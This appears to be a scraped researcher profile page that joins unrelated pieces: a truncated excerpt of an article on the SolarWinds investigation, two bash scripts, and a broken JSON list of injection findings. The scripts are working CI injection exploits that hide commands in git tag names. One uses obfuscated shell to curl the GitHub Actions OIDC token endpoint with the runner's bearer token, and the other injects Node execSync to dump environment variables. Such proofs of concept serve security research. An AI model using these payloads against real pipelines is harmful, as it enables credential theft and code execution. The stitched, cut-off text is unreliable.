François Proulx fproulx-boostsecurity

The Untold Story of the Boldest Supply-Chain Hack Ever

The attackers were in thousands of corporate and government networks. They might still be there now. Behind the scenes of the SolarWinds investigation.

By Kim ZetterMay 2, 2023 6:00 AM

Steven Adair wasn’t too rattled at first.

It was late 2019, and Adair, the president of the security firm Volexity, was investigating a digital security breach at an American think tank. The intrusion was nothing special. Adair figured he and his team would rout the attackers quickly and be done with the case—until they noticed something strange. A second group of hackers was active in the think tank’s network. They were going after email, making copies and sending them to an outside server. These intruders were much more skilled, and they were returning to the network several times a week to siphon correspondence from specific executives, policy wonks, and IT staff.

Adair and his colleagues dubbed the second gang of thieves “Dark Halo” and booted them from the netw

	#!/bin/bash
	#set -x
	git commit --allow-empty -m 'New release'
	RND_SEMVER="v1.3.$((RANDOM % 1000))"
	git tag $RND_SEMVER'$('\
	'S="$(echo${IFS}-n${IFS}IA==\|base64${IFS}--decode)";'\
	'C="$(echo${IFS}-n${IFS}Og==\|base64${IFS}--decode)";'\
	'curl${IFS}'\
	'-H"Authorization${C}${S}bearer${S}$ACTIONS_ID_TOKEN_REQUEST_TOKEN"${IFS}'\
	'"$ACTIONS_ID_TOKEN_REQUEST_URL"'\

	#!/bin/bash
	#set -x
	git commit --allow-empty -m 'New release'
	RND_SEMVER="v1.2.$((RANDOM % 1000))"
	S2='env; aws --version'
	ENC_S2=$(echo -n "$S2" \| base64)
	S1="'+require('child_process').execSync(atob('$ENC_S2')).toString()+'"
	git tag "${RND_SEMVER}${S1}"
	FINAL_TAG=$(git describe --tags --exact-match)
	git push origin "$FINAL_TAG"


	{
	"data": [{
	"injection": {
	"findings": [{
	"location": "github.com/myorg/a/aaa.py",
	"startLineNumber": "1",
	"endLineNumber": "2",
	"type": "sql-injection"
	},